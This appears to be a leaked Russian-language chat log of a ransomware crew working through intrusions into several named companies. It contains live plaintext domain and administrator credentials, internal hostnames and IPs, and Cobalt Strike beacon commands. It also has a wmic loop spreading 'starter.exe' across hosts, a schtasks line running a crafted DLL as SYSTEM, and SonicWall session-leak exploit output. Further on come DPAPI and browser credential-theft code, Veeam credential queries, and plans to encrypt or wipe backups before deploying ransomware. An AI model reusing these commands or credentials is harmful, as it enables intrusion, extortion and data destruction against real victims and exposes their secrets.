\\78167W7P.Wilsonart.com\C$ - Default share
\\78167W7P.Wilsonart.com\IPC$ - Remote IPC
\\78167W7P.Wilsonart.com\print$ - Printer Drivers
\\78167W7P.Wilsonart.com\Ricoh M2554
\\DT01W7P64.Wilsonart.com\ADMIN$ - Remote Admin
\\DT01W7P64.Wilsonart.com\C$ - Default share
\\DT01W7P64.Wilsonart.com\IPC$ - Remote IPC
\\78735W10E64.Wilsonart.com\ADMIN$ - Remote Admin
\\78735W10E64.Wilsonart.com\C$ - Default share
\\78735W10E64.Wilsonart.com\IPC$ - Remote IPC
\\80109W10P.Wilsonart.com\ADMIN$ - Remote Admin
\\80109W10P.Wilsonart.com\C$ - Default share
\\80109W10P.Wilsonart.com\IPC$ - Remote IPC
\\78140W7P.Wilsonart.com\ADMIN$ - Remote Admin
\\78140W7P.Wilsonart.com\C$ - Default share
\\78140W7P.Wilsonart.com\IPC$ - Remote IPC
``шарынетвышли с точки входа?нет ещенашли ДА?``
DCWAS39.Wilsonart.com
DCWAS48.Wilsonart.com
DEVBIOBI.Wilsonart.com
DEVBIESS.Wilsonart.com
DEVBIHFM.Wilsonart.com
DEVBIPLN.Wilsonart.com
DEVBIWEB.Wilsonart.com
QABIESS.Wilsonart.com
QABIHFM.Wilsonart.com
QABIOBI.Wilsonart.com
QABITAB.Wilsonart.com
QABIWEB.Wilsonart.com~
``FAMIXXPuser9>wilsonart\rockwell
>VantgagePoint
```
beacon> shell net use * \\DCWAS08.wilsonart.com\C$ VantgagePoint /user:wilsonart\rockwell
[Tasked beacon to run: net use * \\DCWAS08.wilsonart.com\C$ VantgagePoint /user:wilsonart\rockwell
[+] host called home, sent: 106 bytes
[+] received output:
System error 86 has occurred.
The specified network password is not correct.
``````
wilsonart\REPORT_BUILDER
rbuilder
```
```
wilsonart\adhesives
pword
```
```
wilsonart\flrcallctr
pword
```
```
wilsonart\flas21
flas21a
```
```
wilsonart\hyperion_Service
waglobal2014
```
```
wilsonart\trackitsql
trackit114
```
```
wilsonart\rockwell
VantgagePoint
``продублирую``
>description: password rbuilder
>description: Generic GroupWise account for Adhesives. Password - pword
>description: Password is pword.
>description: Pword-flas21a. Deco 1
>description: The password is waglobal2014 Password does not expire
>description: For Trackit SQL passqord is trackit114
>description: Service account for DCWAS08 Execel Password is VantgagePoint
``````
====== AntiVirus ======
Engine : Symantec Endpoint Protection
ProductEXE : C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\14.2.5569.2100.105\Bin\WSCSavNotifier.exe
ReportingEXE : C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\14.2.5569.2100.105\Bin64\sepWscSvc64.exe
``````
Domain Controllers:
Server Name IP Address
----------- ----------
DCWAS01 170.7.2.220
TNWAS01 170.7.14.203
FLWAS01 170.7.20.220
UKWAS01 170.7.70.210
FRWAS02 172.25.168.125
DRWAS01 170.7.132.51
``дк``
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
adm-cavailj adm-GrelleS Administrator
alexanm bmccm fowlerh
lucase moorer2 owensd
petersm2 polyreyadmin roeders
solarwindsarm.svc vyombmccm
```
```
Group name Enterprise Admins
Comment Designated administrators of the enterprise
Members
-------------------------------------------------------------------------------
adm-cavailj adm-GrelleS Administrator
fowlerh lucase petersm2
polyreyadmin roeders
```
```
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
cdwsetup
whsetup
WILSONART\Domain Admins
```а где списки еа дк ла даа проверить 1 на ад юзерспонялтипо не запускать батник с 6 командамипроверять по одной командено я тебе советуючтобы навернякада снимай всеа вроде и снялосьвроде карантина то получится как в прошлой сеткевообще не трогать или попытаться снять?+ карантиныон там 7 раз сам себе доверяетну их тут во много меньшеи кербы тожевот)траст он на то и траст (в зависимости от связей между ними)врубиляокейатрасты снимаются и без админ правпоэтому без ебли мозговкак и ятут внутри сети то некем ходить ещёладно понимаю что ты заебалсяв трастыостальное увидим в процесетеоритически да, при условии что у тебя вмик работает domain wideостаётся креды вставитьну всё получаетсявозможныевызов пайпнутых команд в батнике стабильно лучше отрабатывает если прописать креды
минимизирует багитак под токеном неплюс я бы добавил ДА креды к запуску вмика на всякий случайпоменяй на cmd /cясно, понял, убери runнежезапуститчто такое вообще "run"?run зачем?)и подправил неверноя там подправилокC:\starter.exeи кстати, лучше копировать прямо в кореньpsexec_command
wmicexec_command (не помню точное название мсф модуля - но какое-то такое)
они оба даже хеши принимают если клиров не будет под рукойлюбым способома потом запустить ихможно раскидать просто "первой частью" батника файлыможно и псекзекомно можно вмиком от ДА
это "поедет "проще
вмик правда не запустит от системыа штаск обязательно ?вмиком этот экзешник запустить не проще будет?вторая часть где сштаск - ужаснапервая часть окв файлаху меня он был откуда-тону окейнет.не?он типа прямо на mdsn естьтак это же ты писалты хотя бы синтаксис schtasks читал ?какая-то чушь вообщенет не будет само собойжить будет?``
for /F %%i in (C:\ProgramData\hostlist.txt) do @ copy C:\ProgramData\starter.exe \\%i\C$\Windows\System32\starter.exe && wmic /node:%%i /user: /password: process call create "cmd /c C:\Windows\System32\starter.exe" && ping %%i -n 3 >> .\ping.txt
``@tl2 добавь меня в fusionfirst.localсоздай беседу плз -fusionfirst.local+slypad полетелаКидай, нам всеравно ждать пока рабочий день закончится в техасеslypad.com:443++надо кому-нибудь свежую сеточку пустую?вывод можно в csv поменять, чтобы было удобнейспоконого времени суток)до завтраконечно, отдыхайтеможет на сегодня все?
а то мы уже засыпаем, голова не работает...и вцелом то что я имел ввиду про "чувствительную" сеть - скорее имел ввиду серьезный мониторинг ивентов, там где вся сеть покрыта ЕДР агентами, системами мониторинга и прочими злыднямину и опять же... хак штука "не статичная", что-то откроетсякоторый слабо отличается от реального ада Азур облачки как раз предоставляют прямо из коробки свой Azure-ADмайкрософт движется в направлении внедрения своих облаков в первую очередьесли вести речь о "немаленькой" сеткепри таких настройкахе нельзя админить грубо говорятакая сеть просто не будет работать@user1 то что ты описал невохможно на практикесдайся враг, замри и лягмы пока немного очень работаем с "чувствительными" сетями - но когда до таких дойдет дело... вобщем вы уже и сами понимаете что "все сломать" можно даже с впна. и иногда это единственный метод...будет много случаев когда это потребуетсяв том что можно использовать вне контекста конкретных пользователей манипулируя даже удаленно файловой системой и доменомогромный плюснужно раскурить самому, тут гайды неуместны слегка такие "прямые" потому что один из ключевых механизмов хранения кредвообще
суть DPAPI атакэтот вопрос надо задать себе))))риторический вопрос:grin:хуйли я всю ночь этот мастеркей доставал и ничего в итоге не получилеще какие-то вопросы, накидывайтевсех в sprouselawдобавлю)скажите кого куда добавитьпожалуй пора всех нас в эту конфу добавитьтак нас туда никто не довабил чет@user7 если это относится к какой-то сетке - кидай пожалуйста в соответствующую конфуenjoyhttps://blog.stealthbits.com/manipulating-user-passwords-with-mimikatz-SetNTLM-ChangeNTLM/мимикатц это умеетагаобратно на известный?не, пароль ладно. а как хэш поменять?по-разному можно
повершеллом
можно просто через кмддаж не знаю куда подробнее))
поменять
пользователю
пароль)
лол
или вопрос в том как удобнее это сделать?а можно подробнее))на тот хеш который у него были поменять потом обратнозайти под нимхоть 1qwerty1я искал конфиги, не нашел(ты можешь выставить пользаку нтлм хеш любого известного клиртекст пароля``
ну значит ищем клиртекст, плюс можно выставить пользователю свой хеш пароля и потом поменять обратно
```
я же вроде доступно написал.конфиги искали password plus'a самого?Под нужным пользователем не войти под ntlmи развертыванием у себязаканчивая полной выкачкой папки с клиентомвариантов мильенчто "нет"? по рдп пробовали зайти где клиент стоит?
ну значит ищем клиртекст, плюс можно выставить пользователю свой хеш пароля и потом поменять обратнонет клиртекст от рдп а по нтлм не подключаетсянетрдп?клиент который в облако вроде шлет@user9 облако с веб авторизацией?с облачными - ищем вход в клауд и трем там - тут все просто
если затереть нельзя - значит нельщяну по нашей сетке пока ничего...
все компы прошарили, челы не оставляют в хроме\файлах пароли
есть Passwords Plus - там вроде пароли хранят но это облако и тоже хер достанешьНО с ними тоже можно повоевать, они бывают доступны черзе какой-то интерфейс и можно затереть все касеты, там в шкафу есть функция размагричивания даже иногда)это cold tape бекапысамое наверное сложное, а зачастую и нерешаемоеи у них обычно есть ВООБЩЕ ВСЕ что связано с ав/бекапами/каталогами серверовчаще все все это манагится 3-4-5 людьми даже в крупных сетяхГЛАВНОЕ и самое важное!
это изучение содержимого тачек/хоумдир/браузеров айтишниковтут только с наживным опытом с ними разберетесь как работать, по сути - видим что стоит иии... ну просто читаем доки...veeam, acronis, ironmount итдпрактически везде +- одинаковые бекапы используютсявообще, касательно бекапов@user9 да. вот пример бекапа епть
ну понял да, жава сжирает. решимтут 4 Гб макс2х24х4 плашки?Компы древниеугу16 гиг тотал?ддр2??????у нас ддр2 стоит по 4Г слотов больше нет. а у некоторых мать больше не поддерживаетага?
```
Acronis Backup 11.7 Management Console 11.7.50058
```хуже эксплорера на винде бл.
окей, по оперативке услышалМалинка быстрей работаетпонялжава ебучая жрет всеОперативыram кончается@user3 чего в конфигах не хватает? System Load что показывает? РАМ жрет?``
URL : https://cloud.malwarebytes.com/ ( https://cloud.malwarebytes.com/ )
Username:
* using CryptUnprotectData API
* volatile cache: GUID:{de823842-69eb-4af0-a1b0-d6b9625b796f};KeyHash:883bc94ae7ab70b09830fab37259abfc3cdf7fc9;Key:available
* masterkey : 51a6f051e98d0d633d79bacbb355e3a5712c4f8a14f31fe332bb587047635a22e19cce783bb6cf8927eb9b590159f059e069a26186ce651e3aba7db2481f04d1
Password:
```
```
URL : https://cloud.malwarebytes.com/ ( https://cloud.malwarebytes.com/ )
Username:
* using CryptUnprotectData API
* volatile cache: GUID:{2539f04d-b7c0-487a-97d8-c818e2889122};KeyHash:003f69a0852d9f879bebbfe1aaad91d7fcac9b34;Key:available
* masterkey : fa0ee6549e47088279eafd681cc050d2f5f15a2618d818c9f286532ceeef0c10aaf31c26d4d4a5d1e226380e383a8626fd1cbaf4d165e47a75791a809adb682a
Password:
```
:zany_face:Компы демонически виснут! Нельзя так просто взять и открыть браузер кобу и блокнот!
у вас сейчас три вроде, надо еще? если да - скажите какие сервера и сколько вам нужно` по необходимститак, господа, по вопросам
1. smb_login с кредами на ДК / net use на ДК / логин в аутлук или вебмейл (если привязана доменная авторизация) / ldap_login (https://github.com/lanjelot/patator) например пататором
2. Первая часть - рудиментарный LM hash, можете смело забыть про то что это такое у нас он был и будет всегда одинаков, вторая - NTLM hash, собственно тот который мы юзаем зачастую для авторизации
3. Будет позже, сможете задачи ставить через админку на декрипт хешей и брутфорс кипассов/доков/эксельников
4. https://github.com/0xthirteen/StayKit - тут описаны все техники закрепления и разделены по категорям и по уровню привелегий, детальнее тут и расписывать нечего, "уникальных" техник для виндовых систем нету уже годы. Есть альтернативные вещи типа вебшеллов на веб сервера (это aspx код который размещается на вебсервере, в данном случае IIS где "живет" функционльное приложение - чаще всего и удобнее заливать на эксчендж), есть IIS модуль. Пока остановитесь на stay-kit'e потоум что он дает понимание, в дальнейшем просто выдам вам удобный инструмент для закрепления просто через запуск dll
5. все что находится в сети - админят люди. ключ к получению максимально подробных даных об иследуемой ИС находится у админов/сетевых инженеров. Это и диграмы и доступы и все остальное. Определить облачные или taped бекапы можно только через них либо по косвенным признакам (сервисы/таски на критичных серверах, записи в ад итп)
6. вопрос некорректный. его не "нужно" делать, smb_pipe это по сути просто вид нагрузки который +- технически равен bind пейлоаду в метасплойте, используется для машин с ограниченями авторизации либо для машин не имеющих возможности дать отстук наружу по стандартному http(s)/dns/tcp протоколу, то есть jump psexec(_psh) 10.0.0.1 pipe это создание сервиса для бинд пайпа по которому потом подключится машина-инициатор
7. выдам билдер дл файлов
8. у вас сейчас три вроде, надо еще? если да - скажите какие сервера и сколько вам нужно
9. А что виснет? я не в курсе.```
192.168.100.240
192.168.100.238
192.168.100.248
192.168.100.237
192.168.100.245
192.168.100.230
192.168.100.219
192.168.100.228
````SPROUSELAW\administrator 1ylft1tmtS_6963`тут?датут?всё норм, отлагаломеня выкинуло из нового рокетане живаявозьмусесия живаябрать сейчас``
+] Checking URL https://50.233.57.77
[+] Found latest version (9.x+) of SMA appliance
[+] Appliance running version 10.2.0.0-14sv
[+] Leaking sessions to dump configuration.
[+] Found: SessionID: P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck= userType: 1 userName: hemrick Password: HEcbccanal20201996 Domain: CANALBARGE
[Done with https://50.233.57.77, found 1 sessions
1
[+] Saving session data
[+] Trying session P8v0xh01buLhUv8weQAbR0hPpBaj0QXcQnJi1JTbpck=
[+] Saving config to ./Dumps/50.233.57.77/config.sqlite
[==================================================]
[+] Config dumped
[+] Parsing configuration data
[+] Finding users
[+] Found 209 users
[+] Finding AD credentials
[!!] Found Active Directory credentials
[+] AD creds :@10.0.10.12
[+] AD creds :@10.0.10.12
[+] Looking for LDAP domain creds
[-] No LDAP credentials found.
[+] Looking for RADIUS domain creds
[-] No usable RADIUS domain data
[+] Parsing bookmarks
[+] Found bookmarks, Hunting for creds
[+] Found bookmark, without creds (Uses the same creds as the sslvpn login for the creating user
{'userGroupID': 115, 'name': 'net extender', 'username': '', 'password': '', 'service': 'UNK_SERVICE', 'host': 'jhecht'}
``в впннет доступа``
1. https://50.233.57.77
2фа, в букмарках ничего нет, бэкап коды не работают
```
тут попробуйте добавить свой букмарк`1. https://50.233.57.77`
2фа, в букмарках ничего нет, бэкап коды не работают
`2. https://173.247.171.106` - #grantweber-com
есть доступ к насу и к ав, нет к сфере, искали везде, можем закрыть172.81.67.174 (retif.com) нет кредов от NASчто в работе из них (скиньте ип) и на какой стадии или по какой причине не в работе3 впна выдавалтак подскажитеотыхайдрузья очень поспать хочется, сильно завис сегодня
часика через 4 вернусь, если совсем отключит - лочьте без меня, вряд ли там сильно будет я бегло посмотрелзавтра скажи @tl1 он закажет новый и срешит этот если там беда)или домен новый, я хз)почините кобуу плзили 5 мин провесит, потом опять сбрасываету user4 сесии живы
при перезаходе в кобальт счетчик сбрасываету меня, вроде бы, с кобальтовским доменом проблемысписок всех ЛА со всех где сняли скинь в групуда, везде почти одинаковые и не катят на серверасо всех 10 сняли ЛА?10 +-а сколько пользовательских?и проверь просто net view на этот хоста на пользовательские ходит[ ](https://mediaeveryone.com/channel/general?msg=pRohhnJJx2iZKt2ct) а на пользовательские?в лс напиши новый паснет доступа на смену пароляну где пишет что у него есть доступ к шарам admin$ remote и тдс каких серверов?без домена вроде не пускали, но мы снимали пользователей с серверов, и там нет этого пользователя и его группа без домена?да
говорит что просто пользакsmb_login что говорит на эти хосты?а вы все хосты проверили?user8 нет, параметры не скажу, а контекст был микроадмина (nddevbernst)а какой контекст был на момент запуска и параметры?но ходит туда никакчто много где админ шарытам был выше выводuser8 запускал, все выходыне работал лола вы до этого не запускали?там 20500 пк)Invoke-ShareFinder работает, но туговиднодомен видно?``
beacon> execute-assembly /home/user/TOOLS/2/SharpShares.exe shares
[*] Tasked beacon to run .NET program: SharpShares.exe shares
[+] host called home, sent: 117815 bytes
[+] received output:
[*] Parsed 0 computer objects.
```
С этим можно что сделать?даесли что, хэши от инвея побрутить можно?))**умер от ожидания**сесий не будетожидает файла в сис32 директории и запрещает его удаление``
The "poc.exe" simply waits until the file is created in our target directory and then places an oplock in order to prevent the deletion (which will fail because of sharing violations)
```вот это я как раз не понял, вроде бы он перемещает дллку в сис32 и poс.ее запускаетили это способ не только перемещения, но и запускат е наш пользак становится ЛА на это файла и дает возможность сделать запуск из под админау нас права на доступ только в этому файлу и всенет, ну она там лежит, хорошо, мы запускаем то е под юзером без правнаоборот т е он дает тебе права юзера если ты админ?))[ ](https://mediaeveryone.com/channel/general?msg=SbqzTPKW2M9FeShdA) а не наоборот?а в данном случае мы имем права на запуск именно нашего файла из этого путисуть в том, что этот сис32 лежит в шаре admin$ а если ты имешь туда доступ, то это дает тебе админ права/системуЭто понятно. Но как я понял весь смысл этой движухи засадить свой файл в истем32 без прав. А дальше этот факт уже надо как то использовать. А вот как не понятно. Вроде от туда можно запускать приложения на которые UAC не ругается, но я не уверен)т к по статье автора, когда цикл ntuser.pol отрабатывает он удаляет файл из систем32ну суть его в том, что он мониторит когда файл создается и запрещает его удалениену дасмущает poc.exe?[ ](https://mediaeveryone.com/channel/general?msg=E8XQ2yp8EmqGYw4xB) на сколько я понял она очень простая, но могу ошибаться[ ](https://mediaeveryone.com/channel/general?msg=sHoWE5nicZ62h7BrQ) ну это сейчас есть, а в новых сессиях не факт)Ну и реализация несколко туманная)Почитал, но у юзаков на компах такого ненашел. Да и система везде есть[ ](https://mediaeveryone.com/channel/general?msg=a7JZYiR6HocfAtrhj) кто нибудь проверил?пока так же на 10 +-[ ](https://mediaeveryone.com/channel/general?msg=KAc6NFyvxPs9ZcrNy) текущие пользаки никуда не ЛА?[ ](https://mediaeveryone.com/channel/general?msg=uWyh8hz2oxQYBmsQM) с какой?кстати а что с авой ?Примерно в какое время?всё так же, никак не можем достать ДА и не можем на интересующие нас тачки попастьтак что у нас по текущим сеткам?ага окейда, неделю назад +-я же вам всем раздал новые кобы?время чуть позже скажуновые сесии сегодня будут дапонялон туту 3 опять комп выеб...те кто в сети у меня сейчас4 7 9user8 приболел4)у меня рокет лагает или вас всего 3 сейчас?ПриветВсем приветпо новым сейчас уточню - пока со старыми давайте дорабатыватьЕсть старая не знаем куда сунутьсяДа, пока в старых. Новые будут?всем привет)
есть сессии с чем работать?.Приветточнее изменен[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=Jt67LB3EmuYsCRw7w) .[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=bdH8rCxfysTudq6WW) ты тогда сказал битый)такая же фигня была с паролембыл случай не помню в какой сетитогда он не битыйОн же``
execute-assembly /home/input0/Cobalt/tools/Ghostpack-CompiledBinaries-master/SharpChrome.exe logins /pvk:C:\ProgramData\ntds_capi_0_93f29a7d-eed3-4c1f-99bf-ebeb7603cd2d.keyx.rsa.pvk
```4 сценарийhttps://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=LscPbvhi5ygophcfK) не понялмб устарелвряд ли снимается кривомб дпапи год мод?Все что естьи хромом и хромиумом?Есть пользак который ходит но пароль не снять выше я скинул как он снимается кривоъ
```
https://login.veeam.com/,https://login.veeam.com/auth/realms/veeamsso/protocol/openid-connect/auth,21/12/2020 15:27:42,13253038062778136,londonit@ballymoregroup.com,I ?$??c$C?
```ай блять[ ](https://mediaeveryone.com/group/ballymoregroup-com?msg=2MeFgAscWkyBk65Jc) он в облаке``
using System;
using System.Collections.Generic;
using System.Security.Cryptography;
using System.Text;
namespace Main
{
internal static class Program
{
private static void Decrypt(string b,string a){
if (string.IsNullOrEmpty(a))
{
return;
}
byte[] encryptedData = Convert.FromBase64String(a);
Console.WriteLine(b+':'+Encoding.UTF8.GetString(ProtectedData.Unprotect(encryptedData, null, DataProtectionScope.LocalMachine)));
return;
}
private static void Main(string[] args)
{
Decrypt("bakkeOffice","AQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAGyv+yhssxEaNJF2obQfCSwQAAAACAAAAAAAQZgAAAAEAACAAAADMbPI8UL6dI5ivLmmtbfPselp0losssqbnFyWIqg29eAAAAAAOgAAAAAIAACAAAACnK/tIFTdbgO3ok5+WFnVl/d/uIE8YgcLB4YG5seXZVxAAAABLnxZoyMe7WVmWzeeRMB4CQAAAAIoDxg8RrE5TlSrxAt7CBh+arMdVWKWT0SCoWio0nUMPFXBBSP5NQ0tWZd5V8r6WzOqKWVYWOHBBocQR61bQx98=");
}
}
}
``````
"c:\Program Files\Microsoft SQL Server\110\Tools\Binn\sqlcmd.exe" -S localhost,49264 -E -y0 -Q "SELECT TOP (1000) [id],[user_name],[password],[usn],[description],[visible],[change_time_utc]FROM [VeeamBackup].[dbo].[Credentials];"
```с виамом есть?доступ на серверв группу ремоте десктоп усерс добавленпокачто наашли только у одного пользакау других снимали?Хотим попасть по рдп что б креды глянуть от вима. Увы не пускает``
BALLYMOREGROUP\Administrator K33p1ngIT53cur3!?!?
BALLYMOREGROUP\CITAdmin L0ndonT0w3r2009!
BALLYMOREGROUP\bespadmin drithEyuDAZ07ac
BALLYMOREGROUP\nreid D0niford1259!
нужна новая кобанет, не нимали
я нашел креды и от да
и доступы к
и доступы на сервера где сидят ДА и дамины, но креды менялись месяц назад, а те что есть - устарели(lsadump::cacheнет я про mscache?
```
mimikatz vault::cred
``ты про vault?mscache дампали?)файлов logins signon тоже нетна пкя смотрю другой фа обнова ф выходит раз в месяц7 мес назад обновлен вродеа модуль который вы используете какого года?ребятда нет вроде использует``
Size Type Last Modified Name
---- ---- ------------- ----
dir 11/30/2020 14:48:14 bookmarkbackups
dir 11/30/2020 14:45:10 crashes
dir 11/30/2020 14:55:45 datareporting
dir 11/30/2020 14:44:13 gmp
dir 06/17/2020 20:55:20 gmp-eme-adobe
dir 06/17/2020 20:55:21 gmp-gmpopenh264
dir 06/17/2020 20:55:25 gmp-widevinecdm
dir 06/17/2020 20:53:51 minidumps
dir 11/30/2020 14:55:45 saved-telemetry-pings
dir 11/30/2020 14:55:45 sessionstore-backups
dir 06/17/2020 20:54:19 storage
24b fil 06/17/2020 20:54:14 addons.json
0b fil 11/30/2020 14:55:45 AlternateServices.txt
238kb file 01/25/2017 11:52:36 blocklist.xml
64kb file 11/30/2020 14:55:45 cert8.db
208b file 11/30/2020 14:44:08 compatibility.ini
967b fil 06/17/2020 20:54:15 containers.json
224kb file 06/17/2020 20:54:10 content-prefs.sqlite
512kb file 11/30/2020 14:55:45 cookies.sqlite
185b file 06/17/2020 20:54:09 extensions.ini
5kb file 06/17/2020 20:54:13 extensions.json
192kb file 11/30/2020 14:47:14 formhistory.sqlite
16kb file 11/30/2020 14:55:45 key3.db
3kb file 06/17/2020 20:54:17 mimeTypes.rdf
0b file 11/30/2020 14:44:08 parent.lock
96kb file 06/17/2020 20:54:07 permissions.sqlite
10mb file 11/30/2020 14:55:45 places.sqlite
3kb file 11/30/2020 14:44:19 pluginreg.dat
9kb file 11/30/2020 14:55:45 prefs.js
15kb file 11/30/2020 14:44:26 search.json.mozlz4
16kb file 06/17/2020 20:54:07 secmod.db
288b file 11/30/2020 14:55:45 sessionCheckpoints.json
878b file 11/30/2020 14:55:45 sessionstore.js
598b file 11/30/2020 14:55:45 SiteSecurityServiceState.txt
512b file 06/17/2020 20:54:18 storage.sqlite
29b file 06/17/2020 20:53:51 times.json
96kb file 06/17/2020 20:55:27 webappsstore.sqlite
257b file 11/30/2020 14:55:45 xulstore.jso
``дайте листинг профиляможету него, возможно, в мозиле нет сохраненых входовнадеюсь со свежей головой быстро с утра порешаем с мозилой, чето сегодня не получается нифигаесли у вас проблема со снапшотами завтра не сможем начатьмы завтра заканчиваем?у вас тут что?так ребятпрофиль лежит аппдатаесли у него активная сессия туда есть вы сразу поймаете еехм, щас+ историюполучите его сохраненые паролида, и расшифроватьи на локальном дедике воткнуть его профиль под соксомвсе просто, надо забрать папку самого профилялегчайшемозиллаесть мозила, ну и эдж с эскплореромэто хорошохрома нетвидно, пытаюсь посмотреть что в фса c$ видно?rpc is unavailableytnрпс работает?[ ](https://mediaeveryone.com/group/gophersport-com?msg=6JavGHLQrPMDzWvsG) обманул)) только псэкзек работаетвмик же вы сказалипрограмфайлсписок процессова как узнать?[ ](https://mediaeveryone.com/group/gophersport-com?msg=b5o5shtSzFkKDFgmQ) -веб браузеру негокакой[ ](https://mediaeveryone.com/group/gophersport-com?msg=is74ecCBrPYSLJtXx) ?тогда ответье на вопрос который я задал час назадне в комманде дело. другой арм так притянули[ ](https://mediaeveryone.com/group/gophersport-com?msg=bBQffPSigsmYun92B) `shell SCHTASKS /Create /S 10.22.0.13 /u gophersport.local\schtask /p rehpog2013! /tn "OnDemand checking" /tr "cmd.exe /c rundll32 c:\windows\system32\shc.dll entryPoint" /sc onstart /RU SYSTEM`дл которую ты скрафтил, вроде работает но сессия оч быстро умираетпример командыадминскую тачку не получается притянуть. винрм и вми и псэкзек вроде отрабатывают но сессия не прилетает. штаск отключен походу `ERROR: The request is not supported.`так у вас тут что?так что браузер мы еще не видели дажекакой у него браузер?мы на армы не можем попасть и на админские тожеу него в браузере?сферу нашли, а кредов нетнашли таки?еще есть нюанс с всферой, пробуем к админам на комп попастьпереходим к работе к коллегамесли тут на 100% во всем увереныбэкапы, виртуализация, ав и прочеену тогда ваще супер)у вас по сети все?билд естьуже все готовотогда надо сегодня подготовить, чтобы завтра не ждатьокейтогда думаю 6 хватит``
-size[10/15/20/25/30/35/40/45/50/60/70/80]
Этот параметр определяет сколько % файла будет шифроваться(по умолчанию 50%), файл шифруется в разных местах кусками.
При этом базы данных шифруются на 100%, файлы вм на 20% не зависимо от значения параметра.
```[ ](https://mediaeveryone.com/group/gophersport-com?msg=AGh5J9zT3mu5jWym3) ага щасможет в курсенапиши ему в лс[ ](https://mediaeveryone.com/group/gophersport-com?msg=Jxbh8z9YRoGiBPS8y) @tl2 может в курсе?у меня есть сомнения на 6 часов`Shares for 10.2.1.21:
[--- Unreadable Shares ---]
IPC$
[--- Listable Shares ---]
RAID1 ServerHD SSDRAID2 TIF Archive Web schtask
`и принцип не знаю[ ](https://mediaeveryone.com/group/gophersport-com?msg=GeZ52s9MFa6iZRmSy) еще нас, один как минимум, есть[ ](https://mediaeveryone.com/group/gophersport-com?msg=Fr5YK8iryrRrbKw4S) думаю зависит от мощности окружения где запущен как миниумно я там толком не разобрался что та к чемутам 2 диска получается крупныхвижу у вас 2 меткивроде проценов 40ты когда смотрел через гуй там сколько ползунок был?билд же скорее всего большие файлы не полностью шифрует?опять таки там не весь объем данныехватит ли 6 часов``
Volume in drive L is DRnetapp02a
Volume Serial Number is 802E-2DBA
Directory of l:\
06/08/2020 03:53 PM Backups
04/22/2016 10:00 AM VeeamWAN
0 File(s) 0 bytes
2 Dir(s) 2,537,787,944,960 bytes free
``ну хзхз2tb)``
[+] received output:
Volume in drive L is DRnetapp01a
Volume Serial Number is AA21-9C34
Directory of L:\
06/09/2020 09:00 PM Backups
05/09/2019 01:49 PM ProgramData
10/24/2016 08:24 AM VeeamWAN
0 File(s) 0 bytes
3 Dir(s) 2,094,574,211,072 bytes free
``или кая там меткадай dir Z:\давай)давай перед закрытием проебывать не будем)не стоитя помню, щас по рдп зайду посмотрютб+?сколько там объем диска?мне кажется за 6 часов можно вообще дохера файлов потрогать6 часов на весь процесну еще лучшевроде получается 2 часа ночи в 11да нетThe current time is: 9:50:34.39дай еще разок время оттудак вроде в наших 11 у них 11 вечера будет или где то такчтобы бэкапы прошлизавтра рано утром придется начатьесли на то пошлоагав любом случае чек сервера на авможет это он...ну я думаю еще виндэф рубануть перед началомскорее всего с них будут только сессии остальноые в мапвот посмотрите сколько без ав)`[+] No EDR products found! Operate at your own risk!`едр посмотрите там где пробовалину. я помню. он сегодня отвалился как разпотому что я сам его притягивал))хм, принт притянулсяего попробуйтетакой сервер там естьz1printтогда - не работаетс двумядлл с флагом стэй?и дл проверьтедак мы и так продолжаем искать)у вас есть шанс все проверить потому что завтра уже не будет времени на это)не факт что естьда вот хз. я думаю это виам там хранит. а гпервизоров их вообще ни видатьу нас получается виртуализация хранит снапы на том диске?чтобы проверить что она работаетдля начала 1-2 сервера притяните в кобу через дллесли с ней разберетесь можно было 2 закрытьтам еще одна сеть на подходено не просто сидеть и ждатьпришлось до 2-3 ночида)у них 9 утра, только начался рабочий день)тоже вариантдавай тогда завтра сутра и начнем?)тут без вариантовугу)бля это опять ночью закрывать будем?если начнем под носом админов они просто все ребутнут и этот диск на овердофига гб даже на половину не зашифруетсямы щас все равно не начнем у них рабочий деньближе к началу выдама билд?лучше в шифря локально пересоберу точно рабочий вариантдавай шелкодмы в старойкоба 4.2 завелась? или вы в старой работаете? или вобще через впн?щас скинуя конечно не на 100% уверен, но выглядит это как диск подключенный к виам уан.[ ](https://mediaeveryone.com/group/gophersport-com?msg=zs9ACCiTbycvsjNsy) если сторонняя инфа имеется то не стоитможно попробоватьесть предложение его форматнуть и дефрагментиваротьтам весь диск это бэкапы?The current time is: 9:11:35.49скажи мне там еще время сейчасга
тогда в шифрвиндакакая ОСа диски опять таки лежали где?но такой объем будет долго шифроватьсявсегоскорее всгеоя так думаю лучше пошифровать, а то удаленные можно восстановитьконечно)у нас доступ к этому диску ест ь?там интересная система - есть такая хрень veeam one называется. я в ее админку залез, поспотрел что как и нашел два сервака у которых диском Д (условно) подключены винты на дохера гигабайт и вот на них и лежат бэкапы[ ](https://mediaeveryone.com/group/gophersport-com?msg=eYeeFtaRDpCZgE3Qy) сканеры не дремлют)а они где лежат?ага, вспомнил... бэкапы виртуалок мы нашл, а вот что лучше удалить их, или пошифровать?в мсфвпска кстати тоже паленая походу, постоянно левые сесси прилетают и отваваютсяну в мою новую кобу вообще ничего не летит)но скорее всего щас выдам 3 кобы на 4.2решаю вопросвозможно кобы паленые - поэтому..ну трендмикро не такой и кусачийдругое дело)`[+] Trend Micro Inc Found!`ну точно же))он могет и в ремот смотретьа зач?так не на одну арму не зайти..а edr_query что говорит?может на новые кобы пропустит...на армах, стоит что хер пойми что, режет сессии только в путь[ ](https://mediaeveryone.com/group/gophersport-com?msg=A5hdqvaiMJhC3JSm2) а, это да[ ](https://mediaeveryone.com/group/gophersport-com?msg=dD7JqrCAaEKriCqkx) я про этонет sharsharesсерьезно? шарпснайпер сработал?```
Administrator backup erictitchenal
ilssql mattpeterson o365sync
schtask symbackup trackit
veeambackup veeamone watchguard
User: erictitchenal - IP Address: 10.22.0.10 (r90sflx3)
User: mattpeterson - IP Address: 10.22.0.13 10.10.0.54 (itvm1) (z1ftp)
``````
gophersport.local\schtask rehpog2013!
